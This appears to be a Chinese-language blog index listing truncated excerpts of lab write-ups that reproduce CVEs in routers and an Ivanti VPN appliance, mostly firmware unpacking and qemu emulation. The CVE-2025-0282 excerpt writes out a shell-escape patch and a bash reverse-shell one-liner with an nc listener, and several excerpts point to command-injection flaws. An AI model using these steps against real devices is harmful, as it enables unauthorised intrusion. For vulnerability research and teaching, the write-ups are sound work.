CVE-2023-26315
[[CVE]]固件下载Ubuntu25.10IDA9.1binwalkqemufirmwalker 固件解包&解密需要用到ubireader_extract_imageUBI Reader 是一个 Python 模块和脚本集合,能够提取 UBI 和 UBIFS 镜像的内容,并分析这些镜像以确定使用 mtd-utils 工具重新创建它们的参数设置 先下载poetry 1pip install poetry 安装 UBI Reader 123git clone https://github.com/onekey-sec/ubi_readercd ubi_readerpoetry install 启动虚拟环境 1source /root/.cache/pypoetry/virtualenvs/ubi-reader-lHfwYMKj-py3.10/bin/activate binwalk解包 1binwalk -Me miwifi_ra70_firmware_cc424_1.0.168.bin 但是其中小米的前端也是用的Lua编写的并不是可以直接反编译的文件,需要使用unlua...
WAVLINK-NU516复现
环境[[CVE]][固件下载](Firmware - WAVLINK ROUTER Docs)WAVLINK-NU516-V251208WAVLINK-NU516-V240425Ubuntu25.10IDA9.1binwalkqemufirmwalker 固件仿真binwalk解包 1binwalk -Me WAVLINK.bin 1readelf -h lighttpd mips小端序 固件模拟在下载以下内容 12debian_squeeze_mipsel_standard.qcow2vmlinux-3.2.0-4-4kc-malta 宿主机配置虚拟网卡 123sudo ip tuntap add mode tap name tap0sudo ip addr add 192.168.10.1/24 dev tap0sudo ip link set tap0 up 启动模拟 12345678qemu-system-mipsel \ -M malta \ -cpu 74Kf \ -kernel /home/ming/下载/iot/WAVLINK25/vmlinux-3...
CVE-2026-1328
环境[[CVE]]固件下载Ubuntu25.10IDA9.1binwalkqemufirmwalker 固件仿真1binwalk -Me TOTOLINKL.web firmwalker 分析 web服务程序是 -root/usr/sbin/lighttpd MIPS 小端序架构 qume模拟在下载以下内容 12debian_squeeze_mipsel_standard.qcow2vmlinux-3.2.0-4-4kc-malta 宿主机配置虚拟网卡 123sudo ip tuntap add mode tap name tap0sudo ip addr add 192.168.3.1/24 dev tap0sudo ip link set tap0 up 启动模拟 123456sudo qemu-system-mipsel -M malta \ -kernel /home/ming/下载/iot/CVE-2026-1328/vmlinux-3.2.0-4-4kc-malta \ -hda /home/ming/下载/iot/CVE-2026-1328/debia...
CVE-2025-0282
实验对象:Ivanti Connect Secure 22.7R2.3[[CVE]]虚拟机下载 环境配置使用vm打开后,配置如下内容对进行配置的ip访问,成功启动 后续我们需要将虚拟机中的文件下载下来首先在这个页面进行等待,直到出现红框中的超时信息,保存快照,挂起虚拟机在虚拟机文件夹中找到对应文件,使用010打开将文件中所有的/home/bin/dsconfig.pl 字符串为 ///////////////bin/sh/home/bin/dsconfig.pl是控制台界面执行时需要调用的脚本文件,替换后等待控制台界面超时后按“回车”,即可获取底层shell成功拿到shell 12nc -lvp 4444 #s宿主机设置监听bash -i >& /dev/tcp/192.168.13.146/4444 0 >&1 #虚拟机反弹shell 为了后续方便操作,我们先反弹shell出来再进行操作 没有python3 ,只有python2,使用python2的 123iptables -L -n #查看当前服务器放行的端口 iptables -A INPUT...
TOTOLINK_NR1800X漏洞复现
环境[[CVE]][固件下载]https://www.totolink.net/data/upload/20220412/f08f694a4322b1e8463abb3d41d21688.rar)Ubuntu22IDA9.1binwalkqemu[[firmwalker]] 固件模拟binwalk 解包 1binwalk -Me TOTOLINK_C834FR-1C_NR1800X_IP04469_MT7621A_SPI_16M256M_V9.1.0u.6279_B20210910_ALL.web firmwalker 分析 readelf 分析busybox 1readelf -h ./bin/busybox mips架构,小端序 先在宿主机配置网卡,用于后面和qemu模拟出来的虚拟机进行通信 12345sudo brctl addbr virbr0sudo ifconfig virbr0 192.168.2.1/24 upsudo tunctl -t tap0sudo ifconfig tap0 192.168.2.11/24 upsudo brctl addif vi...
CVE-2024-39226
[[CVE]]Ubuntu18IDA9.1binwalkqemu[[firmwalker]][固件下载](GL.iNet 固件下载中心 | GL-AX1800 Flint) 固件分析binwalk 解包1binwalk -Me openwrt-ax1800-4.5.16-0321-1711030388.tar 查看文件属性 1busybox: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /lib/ld-musl-arm.so.1, no section header 固件模拟先在宿主机配置网卡,用于后面和qemu模拟出来的虚拟机进行通信 12sudo tunctl -t tap0sudo ifconfig tap0 192.168.3.1/24 up 在模拟前需要先[下载](Index of /~aurel32/qemu/armhf)以下内容 123vmlinuz-3.2.0-4-vexpress linux内核...
CVE-2024-7436
[[CVE]][固件下载](D-Link Technical Support](https://www.dlink.com.cn/techsupport/ProductInfo.aspx?m=DI-8100)Ubuntu18IDA9.1binwalk[[FirmAE]][[firmwalker]] 固件分析固件解包1binwalk -Me DI_8100-16.07.26A1.zip 使用firmwalker进行扫描 1./firmwalker.sh /home/blonet/下载/CVE-2024-7436/_DI_8100-16.07.26A1.zip.extracted/_DI_8100-16.07.26A1.trx.extracted/_8C.extracted/_3F8000.extracted/cpio-root 搜索与jhttp相关的文件 1grep -ir "jhttpd" 分析sbin/rcrc里起的jhttpd服务系统启动过程中会执行名为 init 的程序,这边做了软连接,启动时就会启动rc程序 固件模拟使用FirmAE进行模拟...
CVE-2021-43474
[[CVE]][固件下载](D-Link Technical Support)Ubuntu18IDA9.1binwalk[[FirmAE]][[firmwalker]] 固件分析binwalk解包先使用binwalk 查看固件信息 1binwalk DIR823G_V1.0.2B05_20181207.bin Squashfs文件系统再进行解包 1binwalk -Me DIR823G_V1.0.2B05_20181207.bin 我们先来分析etc文件夹中的inittab启动信息我们继续查看rcS文件watchdog应该是一种进程的监控程序,启动1000秒后启动web服务文件goahead ,#boa 是被注释掉的,boa 没有被启动 checksec&file查看文件信息文件为mips,未开启保护 我们使用ida打开goahead文件进行分析 我们着重关注 12if ( sub_423F90() < 0 ) return -1; 中的sub_423F90函数 管理界面初始化函数第14行 sub_416908("adm", 7, 3, ...
CVE-2025-8949
[[CVE]]Ubuntu18IDA9.1binwalk[[FirmAE]]固件下载[[firmwalker]] 固件仿真1binwalk -Me DIR825B1_FW210WWB01.bin MIPS架构32位大端序使用[[firmwalker]]进行扫描-root/sbin/httpd为web服务器 1sudo ./run.sh -d dlink DIR825B1_FW210WWB01.bin 使用FirmAE对其进行固件模拟 漏洞分析根据poc漏洞点在httpd文件中得get_ping_app_stat函数中 ping的值是通过sub_412E48函数中的ping_ipaddr进行获取直接赋值给全局变量,没有任何过滤可以对其进行命令注入后续ping的值经过 parse_special_char函数进行处理,parse_special_char是一个外部的函数我们继续进行搜索 12grep -r "parse_special_char" | grep "匹配到二进制文件"#在文件中进行搜索相关的文件 parse_...
CVE-2020-11790
[[CVE]] NETGEAR R7800 存在命令注入漏洞环境:Ubuntu 22 IDA 9.1 固件下载 FirmAE binwalk 固件仿真1binwalk -Me R7800-V1.0.2.62.zip 根据poc 漏洞存在于uhttpd文件中,我们使用qemu user mode 仿真对其进行仿真操作 123456/CVE-2020-11790/_R7800-V1.0.2.62.zip.extracted/_R7800-V1.0.2.62.img.extracted#cd 至此处sudo apt install qemu-user-static libc6-arm* libc6-dev-arm*cp `which qemu-arm-static` .sudo chroot . ./qemu-arm-static --strace ./usr/sbin/uhttpd -h /www -r R7800 -f -x /cgi-bin -t 80 -p 0.0.0.0:80 -C /etc/uhttpd.crt -K /etc/uhttpd.key -s 0.0.0.0...










